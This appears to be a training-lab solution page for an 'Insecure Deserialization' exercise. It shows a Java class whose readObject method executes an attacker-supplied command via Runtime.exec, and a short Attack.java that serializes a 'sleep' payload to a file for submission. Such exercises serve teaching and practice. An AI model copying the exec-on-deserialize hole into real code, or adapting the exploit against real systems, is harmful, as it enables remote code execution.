Insecure Deserialization
5/
VulnerableTaskHolder.java
package org.dummy.insecure.framework;
import java.io.*;
import java.time.LocalDateTime;
public class VulnerableTaskHolder implements Serializable {
private static long serialVersionUID = 2;
private String taskName;
private String taskAction;
private LocalDateTime requestedExecutionTime;
public VulnerableTaskHolder(String taskName, String taskAction){
super();
this.taskName = taskName;
this.taskAction = taskAction;
this.requestedExecutionTime = LocalDateTime.now();
}
private void readObject( ObjectInputStream stream) throws Exception{
stream.defaultReadObject();
Runtime.getRuntime().exec(taskAction);
}
}
Attack.java:
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import org.dummy.insecure.framework.VulnerableTaskHolder;
public class Attack{
public static void main(String args[]) throws Exception{
VulnerableTaskHolder vulnObj = new VulnerableTaskHolder("dyn","sleep");
FileOutputStream fos = new FileOutputStream("serial");
ObjectOutputStream os = new ObjectOutputStream(fos);
os.writeObject(vulnObj);
os.close();
}
}
Last updated